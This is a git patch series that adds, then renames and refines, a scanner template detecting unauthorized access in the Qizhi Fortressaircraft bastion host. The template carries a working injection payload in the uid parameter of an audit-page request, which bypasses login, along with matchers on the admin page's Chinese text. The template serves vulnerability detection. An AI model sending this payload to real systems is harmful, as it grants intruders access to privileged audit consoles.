From 55907e03a9dd5ddc20bbc33eb148b4ebb2f3b559 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 11 Apr 2022 12:12:24 +0530
Subject: [PATCH 1/2] Create qizhi-fortressaircraft-unauthorized.yaml

---
 .../qizhi-fortressaircraft-unauthorized.yaml  | 25 +++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 vulnerabilities/other/qizhi-fortressaircraft-unauthorized.yaml

diff --git a/vulnerabilities/other/qizhi-fortressaircraft-unauthorized.yaml b/vulnerabilities/other/qizhi-fortressaircraft-unauthorized.yaml
new file mode 100644
index 0000000000..a893786241
--- /dev/null
+++ b/vulnerabilities/other/qizhi-fortressaircraft-unauthorized.yaml
@@ -0,0 +1,25 @@
+id: qizhi-fortressaircraft-unauthorized
+
+info:
+  name: Qizhi Fortressaircraft Unauthorized
+  author: ritikchaddha
+  severity: high
+  reference: https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw
+  tags: qizhi,fortressaircraft,unauthorized
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "错误的id"
+          - "审计管理员"
+          - "事件审计"
+
+      - type: status
+        status:
+          - 200

From dda19c0a9b72708740b61f2110d1a97913e4b28a Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 12 Apr 2022 01:37:20 +0530
Subject: [PATCH 2/2] Update and rename
 qizhi-fortressaircraft-unauthorized.yaml to
 qizhi-fortressaircraft-unauth.yaml

---
 ...authorized.yaml => qizhi-fortressaircraft-unauth.yaml} | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)
 rename vulnerabilities/other/{qizhi-fortressaircraft-unauthorized.yaml => qizhi-fortressaircraft-unauth.yaml} (75%)

diff --git a/vulnerabilities/other/qizhi-fortressaircraft-unauthorized.yaml b/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml
similarity index 75%
rename from vulnerabilities/other/qizhi-fortressaircraft-unauthorized.yaml
rename to vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml
index a893786241..eb8e77795c 100644
--- a/vulnerabilities/other/qizhi-fortressaircraft-unauthorized.yaml
+++ b/vulnerabilities/other/qizhi-fortressaircraft-unauth.yaml
@@ -1,11 +1,11 @@
-id: qizhi-fortressaircraft-unauthorized
+id: qizhi-fortressaircraft-unauth
 
 info:
-  name: Qizhi Fortressaircraft Unauthorized
+  name: Qizhi Fortressaircraft Unauthorized Acccess
   author: ritikchaddha
   severity: high
   reference: https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw
-  tags: qizhi,fortressaircraft,unauthorized
+  tags: qizhi,fortressaircraft,unauth
 
 requests:
   - method: GET
@@ -15,10 +15,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "错误的id"
           - "审计管理员"
           - "事件审计"
+        condition: and
 
       - type: status
         status: